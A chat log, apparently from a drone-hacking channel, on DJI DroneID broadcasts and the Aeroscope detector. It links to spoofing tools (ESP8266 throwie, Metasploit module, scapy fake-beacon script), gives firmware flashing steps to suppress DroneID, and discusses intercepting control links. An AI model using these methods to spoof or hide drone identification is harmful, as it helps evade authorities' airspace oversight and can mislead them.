[2019-12-10 14:11:18] exumpw : I just added to throwie modifiable values and changed few bytes to correspond with my Mavic 0900 WiFi droneid packets. <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie>

[2019-12-10 14:16:51] jcase : have you tested it with an aeroscope?

[2019-12-10 14:17:01] jcase : because ESP8266 doesnt broadcast on the correct channel

[2019-12-10 14:24:08] exumpw : I dont have an aeroscope. I only tested with kismet and wireshark. Just of curiosity what is wrong with esp8266 channels? Was it discussed somewhere before?

[2019-12-10 15:15:36] validat0r : Well I have no aeroscope, so who knows if it works

[2019-12-10 15:16:27] validat0r : But to be sure I also changed the rf/ac Mac and beefed up the wep key

[2019-12-10 16:25:29] boris.plintovic : Droneid with ruby? Or only change MAC and WEP?

[2019-12-10 17:55:42] jcase : @exumpw DJI uses non standard wifi

[2019-12-10 17:56:26] jcase : I have a prototype AS, and I have some ESP8266 boards

[2019-12-10 18:37:19] exumpw : Is it true controlling from phone wifi too not RC (for Spark)? I read in kismet repo that Spark RC use non standard wifi (you can only see it with atheros ath9k pci card, configured for quarter-channel mode). My Mavic Pro 0900 in Wifi mode seems to use standard wifi and is captured by kismet.

[2019-12-10 18:38:48] validat0r : phone <-> AC has such a poor range, idk who uses that anyway

[2019-12-10 18:40:15] validat0r : spark RC <-> AC should use non (in some respect) standard wifi in ad-hoc mode .. and drone id packets are transmitted using this quater-chan-mode

[2019-12-10 18:41:15] validat0r : and not every run-of-the-mill wifi card can be tuned to that mode. we experimented a bit and found some chipsets that were capable of capturing

[2019-12-10 18:42:44] validat0r : I used the atheros wifi card in my old T41p, which could at least see droneid packets on 2.4GHz

[2019-12-10 18:43:22] validat0r : in my notes I have this one: Atheros ath9k Atheros QCNFA222 AR5BWB222

[2019-12-10 18:43:51] validat0r : it's said it can capture the 5.8GHz packets, too. but I dont have it.

[2019-12-10 18:47:03] exumpw : Phone WiFi - AC has no practical use, but use standard WiFi I think. But question is whether aeroscope capturing it or not?

[2019-12-10 18:47:46] validat0r : it's said it has like three dji rcs build in .. some I guess at least one of them will capture it

[2019-12-10 18:48:39] exumpw : If not then esp8266 throwie is useless indeed. Although as I were saying, I think fake beacons still should be easily detected.

[2019-12-10 18:50:43] validat0r : it's proof of concept anyway ..

[2019-12-10 19:19:05] markusfriedl : should mavicmini be capturable via kismet and monitormode?

[2019-12-10 19:55:38] validat0r : Yes. Did it already.

[2019-12-10 20:02:44] markusfriedl : Then i guess i do something wrong or my adapter won't support it... started app and mavicmini... started kismet... set my alfanetwork card in monitor mode.. and use the the filter for uav.. anything wrong here?

[2019-12-10 20:05:29] exumpw : You dont need to use filter for UAV in kismet. Just find drone wifi network click on it and droneid or mac / ssid match will be in one of left menus. You may need to turn on motors to get droneid packets on Mavic.

[2019-12-10 20:07:05] exumpw : there are screenshots how it looks few posts above.

[2019-12-10 20:09:06] markusfriedl : i'll try it again with motors on

[2019-12-10 20:28:18] markusfriedl : still not seeing anything... motor is on and monitor mode is capturing all packets around but no mavic mini

[2019-12-10 20:30:10] exumpw : maybe its working on 5.8 ghz?

[2019-12-10 20:37:03] markusfriedl : also switched the channels in the app.. at the current state i think wifi dapter maybe is the problem.. but not sure

[2019-12-10 20:43:09] validat0r : Alpha sucks

[2019-12-10 20:43:33] validat0r : Have one too. Have never seen anything with it.

[2019-12-10 20:44:51] markusfriedl : could you suggest a good external one that works well with kali?

[2019-12-10 20:49:32] validat0r : No

[2019-12-10 20:50:07] validat0r : Back in the days Kevin said there are only good PCI cards. Maybe m2

[2019-12-10 20:57:24] markusfriedl : in my old lenovo there is just an "Intel Corporation Centrino Advanced-N 6205" and then i have to external (and also quite old) "Alfa AWUS036H"... i guess both of them are not the best... would appreciate any good hint for another external card

[2019-12-10 21:07:12] validat0r : Try the first one. Maybe you're as lucky as I was

[2019-12-10 21:10:40] markusfriedl : unfortunately not... i tried both

[2019-12-12 02:11:45] jcase : Atheros QCNFA222 AR5BWB222 is what you want

[2019-12-15 09:13:42] markusfriedl : anyone knows an example of making false droneid packets.... like with python and scapy module? haven't found a good example so far

[2019-12-15 15:53:28] jcase : @markusfriedl there is an exploit doing just that on github but you need specific wifi adapters

[2019-12-15 16:22:06] markusfriedl : @jcase can you send me the link please? :slightly_smiling_face:

[2019-12-15 16:24:21] jcase : you would need to gogole

[2019-12-15 16:24:23] jcase : just like i would

[2019-12-15 16:24:35] jcase : google kismet dji

[2019-12-15 16:35:21] markusfriedl : googled for that also.. but as i said.. nothing in python/scapy.... unless i've overseen something.

[2019-12-15 18:26:20] dkovar : <https://www.kismetwireless.net/development/droneid/> Freek’s github repo appears to be no longer available.

[2019-12-15 18:28:45] markusfriedl : thank you but i know that link already.. unfortunately in the pdf linked there is not the whole python code in it

[2019-12-15 18:29:16] dkovar : Yes, it used to be in the repo which appears to no longer be available.

[2019-12-15 18:29:49] markusfriedl : right... :confused:

[2019-12-15 18:42:22] jcase : maybe not python, but enough you could translate it <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie/blob/master/ESP8266_DJI_DroneID_Throwie.ino>

[2019-12-15 18:42:31] jcase : or just sniff it

[2019-12-15 18:42:36] jcase : and resend the packet

[2019-12-15 18:42:40] jcase : were not looking at something hard here

[2019-12-15 18:50:42] jcase : just replay the packet

[2019-12-15 18:53:07] markusfriedl : will try it.. although i wanted to avoid it in the first case :wink:

[2019-12-15 20:16:15] exumpw : <https://pastebin.com/m5bD1zyS> - C esp8266 (my updated throwie version) <https://github.com/DJISDKUser/metasploit-framework/blob/DJIDroneIDSpoof/modules/auxiliary/dos/wifi/droneid.rb> - Ruby

[2019-12-15 20:18:50] exumpw : if you know (or have example) how to send wifi beacon packet in python scapy then inserting to the end of packet droneid data would be piece of cake

[2019-12-16 00:48:46] jcase : @exumpw esp8266 cant send it on the right freq

[2019-12-16 00:48:49] jcase : it doesnt support it

[2019-12-16 00:51:29] exumpw : @jcase yes, I know. You already mentioned it. Is it only for RC mode or for WiFi phone mode as well? Cause WiFi phone mode on Mavic seems regular WiFi.

[2019-12-16 00:51:51] jcase : hmm

[2019-12-16 00:51:55] jcase : mavic pro might be different

[2019-12-16 00:52:01] jcase : but not sure

[2019-12-16 00:52:09] jcase : good catch, forgot that was wifi

[2019-12-16 00:52:24] jcase : know what

[2019-12-16 00:52:28] jcase : ive got some esp8266

[2019-12-16 00:52:32] jcase : if yo uwant to walk me through installing it

[2019-12-16 00:52:33] jcase : we can test it

[2019-12-16 01:01:26] exumpw : If you know how to setup Arduino IDE and set correct board (I have NodeMCU 1.0 ESP 12-E) it should be plug and play. Just compile and upload.

[2019-12-16 01:04:57] jcase : im leaving office, catch me this week and we can test

[2019-12-16 01:14:18] jcase : Aeroscope

[2019-12-16 13:00:29] markusfriedl : created the scapy packet structure.. haven't tested it yet cause i had no time... <https://github.com/Ace-Code1/opendrone/blob/master/fakebeacon.py>

[2019-12-18 09:27:28] markusfriedl : did some additional changes in the script so certain parameters are easier changeable

[2019-12-19 12:58:12] eitan1195 : any idea how the AD9363 in the phantom 4 is configured?(trying to demodulate the lightbridge again)

[2019-12-19 13:39:36] eitan1195 : some of it appears here - <https://github.com/o-gs/dji-firmware-tools/blob/master/lightbridge_stm32_hardcoder.py>

[2019-12-19 14:57:35] eitan1195 : getting"P3X_FW_V01.08.0080.bin: Extracting module index 0, 43776 bytes Error: IV must be 16 bytes long" on the extraction

[2019-12-19 14:58:32] mefisto : @eitan1195 So as you see from the hardcoder, the STM32 chip configures AD9363 via SPI. It is easier to work on Lightbridge from PH3 - it is identical, and has its own separate board. For more info on various firmwares within OFDM, see wikis for modules on this list: <https://github.com/o-gs/dji-firmware-tools/wiki/P3X-OFDM-Receiver-board#programming>

[2019-12-19 15:00:38] eitan1195 : hi, i am mainly intersted in reversing the stm32 for those parts ( i want to simulate the ad9363 with a dev board and imulate lighbtidge)

[2019-12-19 15:00:57] mefisto : For the extraction issue - you can always create an issue in Github; just provide full commandline and log. And for fix-it-yourself: all IVs is Ph3 encryption are just zeros.

[2019-12-19 15:01:57] eitan1195 : super - so i'll fix it myself.basically - if i get the <https://www.aliexpress.com/item/32854593561.html> and program it with the entire set of configs transfered to the ad9363, i should see lightbridge rx,am i wrong?

[2019-12-19 15:03:57] mefisto : You will get a binary stream; but that stream has structure handled by FPGA - you will have to figure out what the FPGA does to it.

[2019-12-19 15:04:34] mefisto : I imagine it does some special serialization, with added error correction.

[2019-12-19 15:06:43] mefisto : To help you with stm32 fw analysis, the partial symbols should be helpful: <https://github.com/o-gs/dji-firmware-tools/tree/master/symbols>

[2019-12-22 07:32:39] eitan1195 : a binary stream - meaning bytes?i do not quite undertsand

[2019-12-22 08:45:31] eitan1195 : and how do i get to reverse the fpga itself?extract etc?

[2019-12-22 12:21:58] eitan1195 : basically - lightbridge is mimo-ofdm over wimax - how would i get it?no grc gnuradio chain for it. :disappointed:

[2019-12-25 03:00:01] mefisto : I mean binary data which is normally descrambled by fpga, to get video stream and duml packets.

[2019-12-25 03:01:10] mefisto : Good question. I imagine you figure out the bitstream format, then its easy.

[2019-12-27 18:29:16] zwontzov.da : <https://techcrunch.com/2019/12/26/the-faa-proposes-remote-id-technology-for-drones/>

[2019-12-31 08:28:17] eitan1195 : in the p3x, any idea where the pairing process happends?

[2019-12-31 14:02:31] nocommie : Haven't been keeping up with the progress here but the latest BS with remote ID and DJIs "let anyone see your info via an app" BS got me wondering. Is it now possible to turn off or change the aeroscope info on an M1 on later hacked FW or an M2P on original hacked FW?

[2020-01-03 18:28:39] dkovar : I'm looking at a CSV file containing Aeroscope logging data. Most of the columns are obvious, but not all. Does anyone have a list of all of the columns, their meaning, and the units?

[2020-02-05 16:43:16] peteair : hi @dkovar, could you share it ?

[2020-02-05 16:47:41] dkovar : Alas, no, as that would reveal the source that shared it with us.

[2020-02-06 18:07:02] bobdole : oh its like that...

[2020-02-06 23:14:03] dkovar : Yeah, there aren't a lot of units out there and any particular region really doesn't have multiple options for which LE agency is operating them. I'm trying to get an "eval" unit, which would eliminate the problem, but that is non-trivial.

[2020-02-07 16:16:51] jcase : Eval unit of what?

[2020-02-07 20:05:37] bobdole : aeroscope :poop:

[2020-02-07 23:23:35] jcase : @jacksphone i have one

[2020-02-07 23:23:37] jcase : at home

[2020-02-07 23:23:48] jcase : i need to fix an antenna on it

[2020-02-07 23:23:52] jcase : from taking it apart

[2020-02-08 00:36:18] bobdole : :sunglasses:

[2020-02-08 00:36:21] bobdole : i want one

[2020-02-08 11:51:46] zwontzov.da : @jcase do you can take photos of disassembled device? :grinning: It is very interesting which boards are used.

[2020-02-08 12:26:44] jcase : no

[2020-02-08 12:28:26] jcase : i dont want to expose any identifying serials etc

[2020-02-08 12:28:34] jcase : its the same one hostile had

[2020-02-08 13:47:52] zwontzov.da : Ok. I understand.

[2020-02-08 13:50:04] zwontzov.da : Why doesn't it work without an one antenna? I thought that they use RX diversity with 2 antennas.

[2020-02-08 13:50:20] jcase : i dont know if it does or does not

[2020-02-08 13:50:26] jcase : i dont know much about RF

[2020-02-08 13:50:33] jcase : and i have antennas

[2020-02-08 19:18:13] dkovar : It may be that we only have the first part of the flight....

[2020-02-11 22:50:42] huge1_10 : dkovar what info do you need re the fields within AeroScope?

[2020-02-11 22:51:55] huge1_10 : Sam the antennas' are PCB based, so half and half, that is one half of RX one half for TX.....

[2020-02-11 22:52:38] huge1_10 : jcase - really who cares about serial numbers, etc, your device transmits them on the Uplink and Downlink for the Quadcopter and its stamped on the quadcopter and RC unit .....

[2020-02-11 22:54:00] huge1_10 : Hostile these days I hear is at one of the Car Giants doing work for them???

[2020-02-12 05:49:39] dkovar : @huge1_10 I got what I needed, thanks for checking.

[2020-02-12 18:53:27] zwontzov.da : @dkovar Did you use SDK for Aeroscope?

[2020-02-13 01:38:57] dkovar : We do not. No legitimate need at the moment, just professional interest in what it does, and the logs it produces.

[2020-02-13 18:05:29] jcase : @huge1_10 i can tell ytou flat out that the AS mobile does NOT transmit serial, it transmits nothing

[2020-02-13 18:06:02] jcase : the AS does NOT make a connection to the AC nor RC

[2020-02-13 18:06:09] jcase : so i have no idea what you are getting on about

[2020-02-13 18:06:25] jcase : the drone ID packet isnt even broadcasted with the other trafgfic

[2020-02-13 18:07:56] jcase : maybe the G8 does, but i dont have one of those

[2020-02-13 19:12:35] jcase : i thought so

[2020-02-13 19:12:41] jcase : but ive not seen them

[2020-02-14 05:58:55] huge1_10 : jcase, I never said or indicated that AeroScope Sends Serial numbers. Aeroscope does indeed have a WIFI built in and so has the ability to connect to the internet, of which if you pay DJI the money, you can connect to the DB they have of all Registered DJI quads in your area. Also, you can ingest maps into Aeroscope, 2 ways, via the WIFI Connection or via SD Card.

[2020-02-14 05:59:31] huge1_10 : Last I knew, Aeroscope can transmit via internet, and it does NOT nor did I ever suggest it sends or transmits quadcopter serial numbers.

[2020-02-14 06:01:40] huge1_10 : re-read what I posted, which is jcase - really who cares about serial numbers, etc, your device transmits them on the Uplink and Downlink for the Quadcopter and its stamped on the quadcopter and RC unit ..... your device in this instance is the quadcopter, not AS.

[2020-02-14 06:01:58] huge1_10 : Does that help

[2020-02-14 13:44:03] jcase : AS can transmit over the internet, it's an option. I've not used the option however. Look at the AS assistant.

[2020-02-25 01:04:10] nocommie : Has anyone looked at what is being broadcast with the DJI Digital FPV system? I just saw a vid of someone claiming "remote ID" is being broadcast. AFAIK it doesn't have a GPS so it would have to be just a beacon that could be triangulated. Or, does it use info fro the baro etc from betaflight or whatever board you connect via serial for the OSD? I just ordered a system and want to know what it does and does not do. Oh, and in the same vid they called out dunhill for his long range Disco flying (they said it was an eBee FFS)

[2020-02-28 18:48:03] eseven : Did you extracted from assistant or internal sd?

[2020-02-28 18:54:04] dkovar : It was provided to us and I think it came from assistant.

[2020-03-07 23:13:24] chipmangini : <https://www.youtube.com/watch?time_continue=601&v=pDK_RlUXUlY&feature=emb_logo>

[2020-03-08 09:57:24] validat0r : Awesome

[2020-04-14 20:20:04] jcase : @boris.plintovic did you delete your emma mod from google drive?

[2020-04-15 17:27:39] boris.plintovic : Yes. I moved to another program. if you need, I upload back to googledisk

[2020-04-15 17:39:19] jcase : @boris.plintovic i can test it on a live AS for you if you want, iu just repaired my spark

[2020-04-15 17:39:25] jcase : i went to do that and it was gone

[2020-04-15 18:10:45] boris.plintovic : [Http://boris.fanatix.sk/Emma.zip](Http://boris.fanatix.sk/Emma.zip) Use dumldorev3.exe, load emma1_dji_system.bin, flash, restart drone, load emma2_dji_system.bin, flash, restart. Test

[2020-04-15 18:22:51] bin4ry : what is emma mod?

[2020-04-15 18:43:18] jcase : drone id patch

[2020-04-15 18:50:11] boris.plintovic : @bin4ry standard aeroscope telemetry in kismet, and next photo with emma. But no test on real aeroscope

[2020-04-15 19:51:48] jcase : @boris.plintovic drone ID function does NOT pick it up, but it is picked up on the RF graphs (as expected). With that said, an additional tool allows intercept of full comms, including positioning data

[2020-04-15 19:52:07] jcase : not much you can do about the latter two

[2020-04-15 19:59:15] validat0r : nice .. you tested that with AS?

[2020-04-15 20:00:37] boris.plintovic : and now please try simple speech

[2020-04-15 20:00:45] validat0r : :smile:

[2020-04-15 20:01:25] validat0r : i'm still chewing on the "additional tool"

[2020-04-15 20:01:58] validat0r : cant do anything about RF emissions

[2020-04-15 20:05:48] validat0r : I wonder how the interception of the "full comms" works though ..

[2020-04-15 20:05:57] validat0r : breaking the WEP encryption on the fly?

[2020-04-15 20:56:18] jcase : @boris.plintovic its ineffective to hide the presence of the drone

[2020-04-15 20:56:24] jcase : @ilovemynexus4 yes i tested it

[2020-04-16 04:59:28] bin4ry : @boris.plintovic i see. what are you doing? mixing modules with an old version of spark firmware or what is your approach?

[2020-04-16 07:04:05] kyokushin : is aeroscope effective against spark .300 firmware? this version should be pre-aeroscope

[2020-04-16 07:32:53] boris.plintovic : yes, easy modulemix. downgrade to 0300 without battery module and upgrade to 0900 without Android system module. Result is clean 0900 with old Android system. One difference ... If you then want to use the "custom 305-306 module, you must use step-by-step Phantom, since the file verify is not in "/sbin/dji_verify" but now in "/system/bin/dji_verify"

[2020-04-16 07:40:27] kyokushin : But 305-306 are FC, if something about drone id is stored then rather in android module than FC, correct me if i am wrong pls

[2020-04-16 08:03:31] boris.plintovic : Aeroscope ID broadcast is in wifi driver (Android system in drone), have nothing to do with FC

[2020-04-16 08:06:15] kyokushin : so its not possible just to take a files from .300 wifi driver and put it to .900 or .1000?

[2020-04-16 08:07:16] validat0r : the files are protected by DJIs crude tamper prevention mech

[2020-04-16 08:07:36] validat0r : well, probably not the drivers

[2020-04-16 08:08:25] validat0r : you'd have to check if the change was in the drivers or the dji_... binary anyway

[2020-04-16 08:08:40] kyokushin : @jcase could you test a @ilovemynexus4 patch on Aeroscope? His patch is for .900 and on Kismet showing promising data

[2020-04-16 08:14:11] boris.plintovic : validat0r have something new (patch)?

[2020-04-16 13:44:55] jcase : 1. im not testingold firmwares, b) aeroscope can pick up the RF, so yes it can detect it

[2020-04-16 13:45:52] jcase : @kyokushin is it significatingly different than @boris.plintovic 's? his works for droneid. Nothing is going to work for the other tools on hand

[2020-04-16 13:59:59] kyokushin : Yes it is very different and worth testing, no module mix, change in specific file @ilovemynexus4 know the details.

[2020-04-16 14:09:06] jcase : @kyokushin for what drone? and how is it different

[2020-04-16 14:09:29] jcase : i mean there are a dozen ways to kill droneid on spark

[2020-04-16 14:09:38] jcase : its not going to do much different, either it works or not

[2020-04-16 14:09:45] jcase : but it wont totally evade aeroscope

[2020-04-16 14:46:16] bin4ry : @kyokushin means ie i think

[2020-04-16 14:51:23] kyokushin : Its for spark, but surely @ilovemynexus4 will explaint better than me how it work

[2020-04-24 07:18:44] boris.plintovic : I didn't edit anything. I used information and older research that DJI modified the wifi driver in the Android drone system. I used modulemix, downgrade to 0300 (latest clean version) and upgrade to 0900 without system module.

[2020-04-24 11:08:02] b1tninja : [https://www.google.com/url?sa=t&source=web&rct=j&url=https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf&ved=2ahUKEwjTrPXu9YDpAhVCmK0KHSA8AN4QFjAAegQIBRAC&usg=AOvVaw3JJk-0p_KiBb9XZz1qcEqC](https://www.google.com/url?sa=t&source=web&rct=j&url=https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf&ved=2ahUKEwjTrPXu9YDpAhVCmK0KHSA8AN4QFjAAegQIBRAC&usg=AOvVaw3JJk-0p_KiBb9XZz1qcEqC)

[2020-04-24 11:08:40] b1tninja : Fuck why is it difficult to get the url of a pdf on Android without Google fucking wrapping it with their crap

[2020-04-24 11:10:37] validat0r : <https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>

[2020-04-24 11:11:11] validat0r : Yeah, that's kevin's paper iirc. always good to look at if you want to get up to speed

[2020-05-06 15:20:32] daviskat : NLD patch, FC serial number is displayed as N / A, can Aeroscope detect the real FC serial number of the aircraft?

[2020-05-06 17:15:14] jcase : its not displayed at N/A, it comes out as fakefakeXXXXXX

[2020-05-06 17:15:15] jcase : but

[2020-05-06 17:15:16] jcase : yes

[2020-05-06 17:15:22] jcase : you can still get teh serial number of the device

[2020-05-06 17:15:25] jcase : just a bit harder

[2020-05-06 18:06:19] boris.plintovic : what exactly is FC Serial number? SN of drone, or?

[2020-05-06 18:23:31] jcase : the serial number of the flight controller

[2020-05-30 22:43:20] nopexecutor : have anyone tried getting same info as aeroscope does from any non-WIFI RF link?

[2020-05-31 00:25:44] jcase : good luck

[2020-05-31 10:22:05] nopexecutor : I managed to get some insight on the ocusync 2.0 signal, based on some RF recordings - the general structure, scrambling, channel mapping, up to decoding and extracting transport blocks (though I haven't automated that yet...). I begin to understand the structure of many transport blocks, but it is still not a complete view. I wonder where did the aeroscope data hid there; not sure yet. There seems to be one small capacity add-on channel, which I have no understanding at all so far (extracted data looks random ;)), maybe it's where it is present...

[2020-05-31 12:53:37] jcase : interesting, i have an aeroscope here, and have some very minor insight into the RF but most of my knowledge is hte protocol

[2020-05-31 12:54:17] jcase : what kind of data are you looking for ? Drone ID is broadcast separate from control signal

[2020-05-31 13:10:43] nopexecutor : Hmm, just trying to grasp what to expect; if e.g. underlying data structure is same in WiFi and some captures are available it may make it easier to find it / understand the encoding in ocusync signal. If it is embedded there at all - I haven't looked for drone emissions at other frequencies. I hope it being separate from control signal as you wrote doesn't mean some second unrelated RF channel, just embedding on some dedicated OFDM symbols of the main downlink...

[2020-05-31 13:12:11] jcase : curious how you got the hop down, im a RF noob but that is the most difficult part. You will find there are more than once variation of OC2, and some will be encrypted

[2020-05-31 13:12:28] jcase : (maybe all but im not positive)

[2020-05-31 13:13:18] jcase : the aeroscope does not handle the hop, it just listends for droneid which should be non hopping

[2020-05-31 14:34:44] david218 : Does the aeroscope still work if these settings are disabled?

[2020-05-31 15:06:48] nopexecutor : hm, I didn't know there is an option to disable it... that may be helpful...

[2020-05-31 16:21:11] david218 : The annoying part is that it enables itself again after every reboot lol.

[2020-05-31 19:45:23] boris.plintovic : @david218 these are not aero packets

[2020-05-31 20:11:57] nopexecutor : hm, so it's for some other drone-id method? Is it for the "drone-to-phone" system?

[2020-06-01 07:25:52] peteair : hey ! really interesting ! I've also managed to get some info on Ocusync 1.0 on my side. It seems very similar to some kind of LTE with a symbol duration of 66.6us (15 kHz subcarrier spacing) and 1200 carriers for 18 MHz BW. I was trying to get the subcarrier mapping by making stats on a lot of packet and trying to isolate the pilot subcarriers. But I'm really curious about how you managed to reverse the scrambling / whitening sequence (if you're willing to share) ? Was it something similar to classical protocols (WiFi / LTE) as I suspected ? I also see the add on channel Ocuysnc 2.0 (slightly shifted from the carrier center freq but with a very slow rate) which was not present in Ocusync 1.0. So it's most certainly the drone id but no luck demodulating it for the moment.

[2020-06-03 06:29:20] eseven : @dave where did you found this settings? Djigo? Version?

[2020-06-06 12:28:22] kyokushin : Is anyone can confirm or deny detection the Spark on .300 fimawre (pre-aeroscope/droneid) by aeroscope?

[2020-06-06 15:35:40] jcase : @kyokushin depending on the software they are using with teh AS, it is able to detect drones without droneid

[2020-06-06 15:35:50] jcase : so yes i can see spark on .300 or any firmware

[2020-06-06 15:38:04] kyokushin : Thanx. How about phantom 3 pro?

[2020-06-06 15:41:04] jcase : yes

[2020-06-06 15:41:29] jcase : it cant get as fine detail

[2020-06-06 15:41:31] jcase : but it can see them

[2020-06-06 16:19:25] kyokushin : You can see the drone operator location both for sparks and p3p or only flying copters?

[2020-06-06 21:27:22] david218 : @miliu00 DJI Fly

[2020-06-06 21:34:13] jcase : @david218 it sitll works

[2020-06-06 21:34:35] jcase : @boris.plintovic yes those are for aeroscope packets, those settings do alter the packets but doesnt disable them

[2020-06-06 21:50:48] boris.plintovic : @kyokushin Aeroscope is developed for DJI drones. All DJI drones have been modified since summer 2017, the driver has been modified to read and transmit telemetry data. FW 0300 Spark is the latest version of fw that does not have this modification. However, there are devices that can detect and track down the rc of any drone. However, everything depends on the operator. I saw such a system in action and the staff scanned only 2.4 and 5.8 bands. This means that if someone switched the control of their DJI to band 2.3 or 2.5, they would probably escape attention.

[2020-06-06 21:58:17] jcase : no they wouldnt

[2020-06-06 21:58:25] jcase : im telling you the aeroscope can detect them

[2020-06-06 21:58:35] jcase : you just need to use the right features of the AS

[2020-06-06 21:58:51] jcase : it has a lot more features than people realize

[2020-06-06 21:59:08] jcase : killing droneid just removes a lot of the specific info

[2020-06-06 21:59:13] jcase : but you can still pick up the drones

[2020-06-07 09:19:05] kyokushin : @boris.plintovic Yes, that is why i asked about .300, but @jcase is telling it is still detecting a drone.

[2020-06-07 13:19:53] jcase : @kyokushin I'll probably get fed up and make a demo video at some point, but it can

[2020-06-07 13:19:56] jcase : ive got one here

[2020-06-07 15:16:34] vznwrks : The portable version I’m assuming? ....you have an SDR with a GPSDO perchance..?

[2020-06-07 15:29:31] jcase : yes and yes

[2020-06-10 17:27:36] hardkore : can aeroscope pickup non-dji drones/controllers? or is it just dji ?

[2020-06-10 17:50:26] jcase : The droneid function no, the RF analysis functions ... havent tested, i dont know the extent of the range of frequencies and i dont know what non DJI drones operate on.

[2020-06-12 16:49:17] nopexecutor : Finally got myself my first DJI drone - MA2 :slightly_smiling_face:

[2020-06-12 16:50:56] nopexecutor : frame structure seems a little different than in P4Pv2... sounding signal position changed. I wonder what else... I hoped for same OcuSync 2.0, but now it seem I have two radio systems to analyze ^^

[2020-06-12 16:52:05] jcase : @takeshi87 it will also sometimes apparently change firmware to firmware.

[2020-06-12 16:55:53] nopexecutor : so maybe just minor changes, will need to check that :slightly_smiling_face:

[2020-06-14 06:45:40] eseven : thx @david218 . This values were available at Djo Go some versions ago. If you set that info, is also broadcasted by the drone in a second packet (not droneid packet). Interesting if you want pilots send info.about their flights. ;)

[2020-06-14 19:23:59] nopexecutor : I can see it's still there in Dji Fly app - at least for MA2

[2020-06-16 16:53:24] nopexecutor : Yup... Frame structure changed a little, channel mapping is different. Scrambling & FEC looks unchanged, I can retrieve transport blocks. I didn't analyze underlying protocol yet in MA2, need to add 64-QAM demod first - otherwise I miss the most interesting PDUs :) Probably after that I'll see what comes after demodulation of what seems to be aeroscope bursts

[2020-06-16 17:01:14] david218 : What extra info/devices does enabling that setting provide? Can other nearby DJI users see you or something...?

[2020-06-16 17:32:23] hazardc : lol no need to prove @jcase just appreciate the insight :slightly_smiling_face:

[2020-06-16 17:33:33] jcase : Prove what

[2020-06-19 03:45:27] ben_lin : now if you remove specific important info from droneid, wouldnt that render the signal quite useless for whoever is using the managing equipment? Like, he knows a drone is here, but doesn't know who this belongs to and where the RC is

[2020-06-19 03:46:02] ben_lin : or, DJI has gone far enough to do RF analysis to locate the RC rather than just getting it from droneID...

[2020-06-19 13:10:34] jcase : @ben_lin I'd disagree

[2020-06-19 13:12:52] ben_lin : So you're saying even if we give droneid 0 info, it is still a threat to the drone operator as long as the physical signals are present?

[2020-06-19 13:34:14] dkovar : Any RF signal is a "threat to the operator".

[2020-06-19 14:33:07] jcase : @ben_lin I'd say the drone is the threat personally, but yeah not only is general detection still possible, intercepting or tampering with the comms is not only possible but a reality. Entirely possible to intercept the link between the RC and AC and pull location data, without droneid, and tooling to do this exists on the market to do this now

[2020-06-19 14:33:47] jcase : hell you can build the tooling for yourself for some of the models for under $100 and implement the software with minimal work

[2020-06-19 16:29:54] fredmicrowave : In a urban area, if your signal is in normal bands (2.4ghz...) and has no ID it can be extremely difficult to RDF ...

[2020-06-19 16:35:13] jcase : @fredmicrowave commercial tech exists to intercept the wifi, light bridge and occusync links, anyone that thinks removing droneid alone stops anything is denial. I can intercept some links as is, with equipment bought off amazon and ebay.

[2020-06-19 16:39:49] fredmicrowave : Oh yes, there must be many data info traveling beside droenid, I was just refering to direction finding a random signal in urban areas... I suppose only a diy drone could escape data interception...

[2020-06-20 00:47:54] hotelzululima : you could use ardupilot (or openpilot?or Paparazzi) with the signal loss failsafe set to complete mission(& then turn off ground rc & xmitters aboard craft(requires a wee bit of custom code) & then yes you CAN construct a stealth aerial robot…

[2020-06-20 00:50:12] hotelzululima : but the frequency hopping sequence for the3DR modems will always be one of 50 sequences dues to errors in the hopping implementation code( wide band SDR & some math is the kryptonite for most commercial hoppers)

[2020-06-20 09:36:38] validat0r : Yep .. Did that with my spark once. Works. Although there's the risk of not reconnecting with your RC afterwards. Had that, too, once. Had to wait until the bat ran empty and catch the ac from about 30ft height.

[2020-06-20 14:49:11] ender : Yes arducopter was the first thign that came to my mind when all the terrorist & criminals vs droneid thing came up. Dirt cheap and frighteningly easy :-(

[2020-06-21 05:19:02] ben_lin : Guess it never is easy to just be cautious and enjoy some aerial photographing then...

[2020-06-21 11:35:30] fredmicrowave : To keep it simple, if the signal identification is more of a concern than the physical drone interception, a simple analog video signal and RC system could work. Or, a completely out-of-band link would be very hard to find. This is why I was talking about urban areas, when you can hide in the forest of rf signals. For photography you don´t need a super stable or fancy drone.

[2020-06-21 11:58:44] ben_lin : That is correct, however for photographers that aren't necessarily very tech savvy, DJI stuff is the first choice. And dense urban areas are likely the only kind of places that photographers need this kind of protection from droneID, as they are quite often deployed there.

[2020-06-21 12:00:00] ben_lin : My thought was that, if droneID has all its info removed, it would be very difficult for those droneID operators to locate the photographer as their DJI-bs equipment on hand, at least from what I know, depends on the info carried by droneID to locate the RC

[2020-06-21 12:01:21] ben_lin : because usually those droeID people are not given extreme professional training and equipment to handle a spoofed droneID signal

[2020-06-21 12:03:32] ben_lin : I went to DJI's site about droneID, and it doesn't even talk about being able to discover non-droneID copters and listed the specific drones that are "compatible" with the devices, which led me to think it might be valuable to spoof droneid

[2020-06-21 13:40:42] w4t3r : What about the data sent to the RC? Isn't that interceptable too? @ben_lin

[2020-06-21 13:42:02] ben_lin : that data sent to the rc doesnt include location data about the rc IF droneID info is removed

[2020-06-21 13:42:35] ben_lin : correct me if i am wrong though, there are people here that are a lot more knowledgeable on this than I do

[2020-06-21 14:31:03] jcase : @ben_lin maybe IF he moved a GREAT distance, but your forgetting that AS can tell the home point, and generally see the full flight path

[2020-06-21 14:45:28] ben_lin : ah, guess DJI does have a few tricks up their sleeves then

[2020-06-21 14:45:51] ben_lin : but wouldnt the flight path and homepoint be part of the info of droneID that can be spoofed? no?

[2020-06-21 14:49:50] jcase : @ben_lin spoof it all you want, or enter privacy mode, bring it near my aeroscope i can gather all the details from it needed to find you

[2020-06-21 14:50:05] jcase : tampering with it is just going to make it obvious something fishy is going on

[2020-06-21 15:37:55] pingspike : has anyone seen any signs of that smartphone app DJI said they were going to release? the one that just lets any random person view the details of the passing drone? did the app ever make it?

[2020-06-21 15:56:02] jcase : @rich the standard isnt even finalized i dont think

[2020-06-21 15:56:05] jcase : certainly the design isnt

